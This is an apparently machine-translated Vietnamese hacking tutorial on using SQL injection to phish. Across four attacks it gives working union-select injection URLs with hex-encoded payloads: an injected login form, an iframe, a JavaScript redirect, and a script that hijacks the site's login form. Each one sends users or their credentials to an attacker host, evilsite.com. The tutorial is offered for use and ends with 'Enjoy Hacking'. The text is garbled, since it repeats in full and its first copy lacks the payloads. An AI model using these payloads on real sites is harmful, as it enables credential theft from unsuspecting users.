Chào mừng bạn đến nhưng tôi một hướng dẫn liên quan đến SQLi, lần này là tiêu đề nói lên tất cả chúng ta sẽ làm lừa đảo với địa chỉ giả mạo bằng cách sử dụng SQL injection vulnerabilty. Đối với những người đã không đọc những điều cơ bản của SQL injection tôi đề nghị bạn đi và đọc N00bz dẫn SQL injection.
Nếu bạn là người mới để lừa đảo tôi cho tôi giải thích, lừa đảo là một cuộc tấn công mà kẻ tấn công đánh lừa người dùng nhập vào các thông tin bí mật của mình được gửi đến anh ta sử dụng bất kỳ trang đặc biệt crafted hoặc ứng dụng, vv
Khái niệm:
Chúng tôi sẽ tiêm tải trọng của chúng tôi vào SQL injection và thêm một số mã bổ sung cho các trang web cũng như chúng ta đã làm trong XSS. Nếu bạn chưa đọc XSS với SQL Injection sau đó Hướng dẫn đọc mà cho một sự hiểu biết tốt hơn.
Tiêm HTML Coded hình thành trang web
Tôi giả sử bạn đọc hướng dẫn ở trên để chúng tôi có thể ví dụ như có một trang web và cho phép nói rằng cột thứ 3 được in trên các trang web như đầu ra. Vì vậy, chúng tôi sẽ tiêm tải trọng của chúng tôi vào đó. Để đơn giản chúng tôi sẽ mã hóa tải trọng của chúng tôi vào hex.
Tải trọng của chúng tôi
Hex Encoded value:
Injecting our payload:
Url sẽ ra trên tải trọng của chúng tôi vào trang web. Và người dùng sẽ thấy một form vào một trang web, trong đó nếu anh ta có thể đăng nhập các thông tin sẽ được gửi đến đạo.
Tiêm khung nội tuyến vào trang web
Lần này chúng tôi sẽ bơm một khung nội tuyến trong các trang web mà làm cho tải trọng nhỏ và chúng tôi có thể làm cho đăng nhập nhìn tốt hơn nhiều theo cách này.
Tải trọng của chúng tôi
Hex Encoded value
Injecting our payload
Url sẽ ra trên tải trọng của chúng tôi vào trang web. Và người dùng sẽ thấy một form vào một trang web, trong đó nếu anh ta có thể đăng nhập các thông tin sẽ được gửi đến đạo.
Chuyển hướng người dùng đến trang Fake của bạn
Lần này chúng tôi sẽ bơm javascript trong trang web mà sẽ chuyển hướng người dùng fakepage của chúng tôi.
Tải trọng của chúng tôi
Hex Encoded value
Injecting our payload
Url trên sẽ tiêm javascript vào trang mà sẽ chuyển hướng người dùng đến fakepage của chúng tôi, trong đó nếu anh ta có thể đăng nhập các thông tin sẽ được gửi đến đạo. Hạn chế nó đã là một phần URL giả mạo. Mà chúng tôi sẽ giới thiệu trong các cuộc tấn công tiếp theo.
6 Tiêm một javascript để thay đổi hiện tại Mẫu Login
Trong cuộc tấn công này, chúng tôi sẽ bơm javascript trong trang web đó sẽ thay đổi hành động của trang đăng nhập hiện tại các trang web để liên kết trang đăng nhập giả mạo của chúng tôi.
Tải trọng của chúng tôi
Hex Encoded value
Injecting our payload:
Url trên sẽ tiêm javascript vào trang đó sẽ gửi các thông tin người dùng đăng nhập vào trang để thực fakepage của chúng tôi.
Thưởng thức Hacking.
Nếu bạn là người mới để lừa đảo tôi cho tôi giải thích, lừa đảo là một cuộc tấn công mà kẻ tấn công đánh lừa người dùng nhập vào các thông tin bí mật của mình được gửi đến anh ta sử dụng bất kỳ trang đặc biệt crafted hoặc ứng dụng, vv
Khái niệm:
Chúng tôi sẽ tiêm tải trọng của chúng tôi vào SQL injection và thêm một số mã bổ sung cho các trang web cũng như chúng ta đã làm trong XSS. Nếu bạn chưa đọc XSS với SQL Injection sau đó Hướng dẫn đọc mà cho một sự hiểu biết tốt hơn.
Tiêm HTML Coded hình thành trang web
Tôi giả sử bạn đọc hướng dẫn ở trên để chúng tôi có thể ví dụ như có một trang web và cho phép nói rằng cột thứ 3 được in trên các trang web như đầu ra. Vì vậy, chúng tôi sẽ tiêm tải trọng của chúng tôi vào đó. Để đơn giản chúng tôi sẽ mã hóa tải trọng của chúng tôi vào hex.
Tải trọng của chúng tôi
<form action=http://evilsite.com/get_it.php method="POST">
Username : <input type="text" name="username"><br>
Password :<input type="text" name="password">
<input type="submit">
</form>
<iframe height=0 width=0>
Hex Encoded value:
0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e
Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e,4--
Url sẽ ra trên tải trọng của chúng tôi vào trang web. Và người dùng sẽ thấy một form vào một trang web, trong đó nếu anh ta có thể đăng nhập các thông tin sẽ được gửi đến đạo.
Tiêm khung nội tuyến vào trang web
Lần này chúng tôi sẽ bơm một khung nội tuyến trong các trang web mà làm cho tải trọng nhỏ và chúng tôi có thể làm cho đăng nhập nhìn tốt hơn nhiều theo cách này.
Tải trọng của chúng tôi
<br><iframe src="http://www.evilsite.com/fakepage.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>
Hex Encoded value
0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e
Injecting our payload
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4--
Url sẽ ra trên tải trọng của chúng tôi vào trang web. Và người dùng sẽ thấy một form vào một trang web, trong đó nếu anh ta có thể đăng nhập các thông tin sẽ được gửi đến đạo.
Chuyển hướng người dùng đến trang Fake của bạn
Lần này chúng tôi sẽ bơm javascript trong trang web mà sẽ chuyển hướng người dùng fakepage của chúng tôi.
Tải trọng của chúng tôi
<script>window.location.href="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value
0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e
Injecting our payload
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--
Url trên sẽ tiêm javascript vào trang mà sẽ chuyển hướng người dùng đến fakepage của chúng tôi, trong đó nếu anh ta có thể đăng nhập các thông tin sẽ được gửi đến đạo. Hạn chế nó đã là một phần URL giả mạo. Mà chúng tôi sẽ giới thiệu trong các cuộc tấn công tiếp theo.
6 Tiêm một javascript để thay đổi hiện tại Mẫu Login
Trong cuộc tấn công này, chúng tôi sẽ bơm javascript trong trang web đó sẽ thay đổi hành động của trang đăng nhập hiện tại các trang web để liên kết trang đăng nhập giả mạo của chúng tôi.
Tải trọng của chúng tôi
<script>document.getElementsByTagName("form")[0].action="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value
0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e
Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--
Url trên sẽ tiêm javascript vào trang đó sẽ gửi các thông tin người dùng đăng nhập vào trang để thực fakepage của chúng tôi.
Thưởng thức Hacking.